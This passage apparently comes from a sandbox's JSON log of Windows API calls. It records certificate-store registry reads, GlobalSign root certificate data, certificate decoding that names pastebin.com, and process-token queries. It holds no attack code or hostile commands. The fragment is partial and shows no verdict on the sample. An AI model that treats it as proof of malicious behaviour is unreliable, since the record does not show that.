                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob"
              }
            ],
            "repeated": 0,
            "id": 1861
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eee5",
            "parentcaller": "0x7ffee0b9ec18",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "ValueName",
                "value": "Blob"
              },
              {
                "name": "Data",
                "value": "\\x03\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\xb1\\xbc\\x96\\x8b\\xd4\\xf4\\x9db*\\xa8\\x9a\\x81\\xf2\\x15\\x01R\\xa4\\x1d\\x82\\x9c~\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x04+\\xebw\\xd5\\x01z\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x7f\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x000\n\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x1d\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00n\\xe7\\xf3\\xb0`\\xd1\\x0e\\x90\\xa3\\x1b\\xa3G\\x1b\\x99\\x926\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x14\\x00\\x00\\x00`{f\\x1aE\r\\x97\\xca\\x89P/}\\x04\\xcd4\\xa8\\xff\\xfc\\xfdKb\\x00\\x00\\x00\\x01\\x00\\x00\\x00 \\x00\\x00\\x00\\xeb\\xd4\\x10@\\xe4\\xbb>\\xc7B\\xc9\\xe3\\x81\\xd3\\x1e\\xf2\\xa4\\x1aH\\xb6h\\\\x96\\xe7\\xce\\xf3\\xc1\\xdfl\\xd43\\x1c\\x99\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x000\\x00\\x00\\x00G\\x00l\\x00o\\x00b\\x00a\\x00l\\x00S\\x00i\\x00g\\x00n\\x00 \\x00R\\x00o\\x00o\\x00t\\x00 \\x00C\\x00A\\x00 \\x00-\\x00 \\x00R\\x001\\x00\\x00\\x00S\\x00\\x00\\x00\\x01\\x00\\x00\\x00@\\x00\\x00\\x000>0\\x1f\\x06\t+\\x06\\x01\\x04\\x01\\xa02\\x01\\x010\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc00\\x1b\\x06\\x05g\\x81\\x0c\\x01\\x030\\x120\\x10\\x06\n+\\x06\\x01\\x04\\x01\\x827<\\x01\\x01\\x03\\x02\\x00\\xc0\t\\x00\\x00\\x00\\x01\\x00\\x00\\x00h\\x00\\x00\\x000f\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x03\\x06\n+\\x06\\x01\\x04\\x01\\x827\n\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x04\\x06\\x08+\\x06\\x01\\x05\\x05\\x08\\x02\\x02\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x06\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x07\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\t\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x01\\x06\\x08+\\x06\\x01\\x05\\x05\\x07\\x03\\x08 
\\x00\\x00\\x00\\x01\\x00\\x00\\x00y\\x03\\x00\\x000\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\Certificates\\B1BC968BD4F49D622AA89A81F2150152A41D829C\\Blob"
              }
            ],
            "repeated": 0,
            "id": 1862
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ec4f",
            "parentcaller": "0x7ffee0b9eb0a",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1863
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9eb33",
            "parentcaller": "0x7ffee0b9e903",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1864
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bb1210",
            "parentcaller": "0x7ffee0bad8a2",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x82\\x03u0\\x82\\x02]\\xa0\\x03\\x02\\x01\\x02\\x02\\x0b\\x04\\x00\\x00\\x00\\x00\\x01\\x15KZ\\xc3\\x940\r\\x06\t*\\x86H\\x86\\xf7\r\\x01\\x01\\x05\\x05\\x000W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x1e\\x17\r980901120000Z\\x17\r280128120000Z0W1\\x0b0\t\\x06\\x03U\\x04\\x06\\x13\\x02BE1\\x190\\x17\\x06\\x03U\\x04\n\\x13\\x10GlobalSign nv-sa1\\x100\\x0e\\x06\\x03U\\x04\\x0b\\x13\\x07Root CA1\\x1b0\\x19\\x06\\x03U\\x04\\x03\\x13\\x12GlobalSign Root CA0\\x82\\x01\"0"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1865
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe549",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID"
              }
            ],
            "repeated": 0,
            "id": 1866
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5c6",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "EncodingType 0"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0"
              }
            ],
            "repeated": 0,
            "id": 1867
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5f4",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "EncodingType 0"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0"
              }
            ],
            "repeated": 0,
            "id": 1868
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbec4c",
            "parentcaller": "0x7ffee0bbe6a7",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "CertDllVerifyCertificateChainPolicy"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllVerifyCertificateChainPolicy"
              }
            ],
            "repeated": 0,
            "id": 1869
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6c9",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1870
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5c6",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": "EncodingType 1"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1"
              }
            ],
            "repeated": 0,
            "id": 1871
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5f4",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000564"
              },
              {
                "name": "SubKey",
                "value": "EncodingType 1"
              },
              {
                "name": "Handle",
                "value": "0x00000568"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1"
              }
            ],
            "repeated": 0,
            "id": 1872
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbec4c",
            "parentcaller": "0x7ffee0bbe6a7",
            "category": "registry",
            "api": "RegOpenKeyExA",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000568"
              },
              {
                "name": "SubKey",
                "value": "CertDllVerifyCertificateChainPolicy"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 1\\CertDllVerifyCertificateChainPolicy"
              }
            ],
            "repeated": 0,
            "id": 1873
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6c9",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000568"
              }
            ],
            "repeated": 0,
            "id": 1874
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe5c6",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegEnumKeyExA",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "Index",
                "value": "2"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\"
              }
            ],
            "repeated": 0,
            "id": 1875
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bbe6e2",
            "parentcaller": "0x7ffee0bbe47d",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              }
            ],
            "repeated": 0,
            "id": 1876
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bc52c4",
            "parentcaller": "0x7ffee0bc4daf",
            "category": "crypto",
            "api": "CryptDecodeObjectEx",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "CertEncodingType",
                "value": "0x00000001"
              },
              {
                "name": "Encoded",
                "value": "0\\x1e\\x82\\x0cpastebin.com\\x82\\x0e*.pastebin.com"
              },
              {
                "name": "Flags",
                "value": "0x00008005"
              }
            ],
            "repeated": 0,
            "id": 1877
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bca292",
            "parentcaller": "0x7ffee34b38c0",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config"
              },
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config"
              }
            ],
            "repeated": 0,
            "id": 1878
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bca30d",
            "parentcaller": "0x7ffee34b38c0",
            "category": "registry",
            "api": "RegNotifyChangeKeyValue",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\"
              },
              {
                "name": "NotifyFilter",
                "value": "0x10000004"
              },
              {
                "name": "WatchSubtree",
                "value": "0"
              },
              {
                "name": "Asynchronous",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1879
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bc822d",
            "parentcaller": "0x7ffee0bca256",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot"
              }
            ],
            "repeated": 0,
            "id": 1880
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bc1c01",
            "parentcaller": "0x7ffee0bc4d45",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\Root\\ProtectedRoots"
              }
            ],
            "repeated": 0,
            "id": 1881
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bc594e",
            "parentcaller": "0x7ffee0bca263",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\SystemCertificates\\AuthRoot"
              }
            ],
            "repeated": 0,
            "id": 1882
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bca292",
            "parentcaller": "0x7ffee34b38c0",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              },
              {
                "name": "Handle",
                "value": "0x00000584"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              }
            ],
            "repeated": 0,
            "id": 1883
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0bca30d",
            "parentcaller": "0x7ffee34b38c0",
            "category": "registry",
            "api": "RegNotifyChangeKeyValue",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\"
              },
              {
                "name": "NotifyFilter",
                "value": "0x10000004"
              },
              {
                "name": "WatchSubtree",
                "value": "0"
              },
              {
                "name": "Asynchronous",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 1884
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9f774",
            "parentcaller": "0x7ffee0bca17b",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "PinRulesLogDir"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRulesLogDir"
              }
            ],
            "repeated": 0,
            "id": 1885
          },
          {
            "timestamp": "2025-11-20 10:58:35,391",
            "thread_id": "1596",
            "caller": "0x7ffee0b9ee82",
            "parentcaller": "0x7ffee0bca1c5",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000564"
              },
              {
                "name": "ValueName",
                "value": "PinRules"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CertDllCreateCertificateChainEngine\\Config\\PinRules"
              }
            ],
            "repeated": 0,
            "id": 1886
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba176e",
            "parentcaller": "0x7ffee0ba16fe",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              },
              {
                "name": "Handle",
                "value": "0x00000590"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              }
            ],
            "repeated": 0,
            "id": 1887
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba15e1",
            "parentcaller": "0x7ffee0ba1531",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000590"
              },
              {
                "name": "ValueName",
                "value": "PinRulesLastSyncTime"
              },
              {
                "name": "Data",
                "value": "\\xaf\\xa4!\\x93\\xa7Y\\xdc\\x01"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate\\PinRulesLastSyncTime"
              }
            ],
            "repeated": 0,
            "id": 1888
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba1608",
            "parentcaller": "0x7ffee0ba1531",
            "category": "system",
            "api": "GetSystemTimeAsFileTime",
            "status": true,
            "return": "0x00000000",
            "arguments": [],
            "repeated": 0,
            "id": 1889
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba16b2",
            "parentcaller": "0x7ffee0ba1645",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000590"
              }
            ],
            "repeated": 0,
            "id": 1890
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee34e74ae",
            "parentcaller": "0x7ffee110dddb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000594"
              }
            ],
            "repeated": 0,
            "id": 1891
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee34e74b7",
            "parentcaller": "0x7ffee110dddb",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000590"
              }
            ],
            "repeated": 0,
            "id": 1892
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee10c54eb",
            "parentcaller": "0x7ffee0baa122",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "29"
              },
              {
                "name": "TokenInformation",
                "value": "\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1893
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee0baa149",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000590"
              }
            ],
            "repeated": 0,
            "id": 1894
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee110026b",
            "parentcaller": "0x7ffee0bcc456",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000590"
              }
            ],
            "repeated": 0,
            "id": 1895
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee10c54eb",
            "parentcaller": "0x7ffee0bcc86b",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xa8\\xe7\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00+\\x06h\\xb7\\xfe\\x7f\\x00\\x00\\xa5\\x9cY\\xb0U\\x13\\x00\\x00h\\xba\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00`z\\xcd\\xe0\\xfe\\x7f\\x00\\x00\\xc0,\\xd7\\x05\\x00\\x00\\x00\\x00\\x10\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00Ozi\\xb7\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x9a\\x00h\\xa3\\xfe\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xbf'\\x8c\\xb7\\xfe\\x7f\\x00\\x008%\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xc0\\xea\\x8b\\xb7\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xb0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x10\\xe9\\xd5\\x06\\x00\\x00\\x00\\x00\\x90\\x05\\x00\\x00\\x00\\x00\\x00\\x00k\\x02\\x10\\xe1\\xfe\\x7f\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 1896
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee10c6785",
            "parentcaller": "0x7ffee0bcc496",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000590"
              }
            ],
            "repeated": 0,
            "id": 1897
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0bcc344",
            "parentcaller": "0x7ffee0baa16a",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000003",
                "pretty_value": "HKEY_USERS"
              },
              {
                "name": "SubKey",
                "value": "S-1-5-21-3318940731-3379818400-2144845357-1002"
              },
              {
                "name": "Handle",
                "value": "0x00000594"
              },
              {
                "name": "FullName",
                "value": "HKEY_USERS\\S-1-5-21-3318940731-3379818400-2144845357-1002"
              }
            ],
            "repeated": 0,
            "id": 1898
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba176e",
            "parentcaller": "0x7ffee0ba16fe",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000594"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              }
            ],
            "repeated": 0,
            "id": 1899
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0baa29f",
            "parentcaller": "0x7ffee0ba17ac",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000594"
              }
            ],
            "repeated": 0,
            "id": 1900
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba176e",
            "parentcaller": "0x7ffee0ba16fe",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              },
              {
                "name": "Handle",
                "value": "0x00000594"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\AuthRoot\\AutoUpdate"
              }
            ],
            "repeated": 0,
            "id": 1901
          },
          {
            "timestamp": "2025-11-20 10:58:35,406",
            "thread_id": "1596",
            "caller": "0x7ffee0ba0a53",
            "parentcaller": "0x7ffee0ba0bb3",
            "category": "registry",
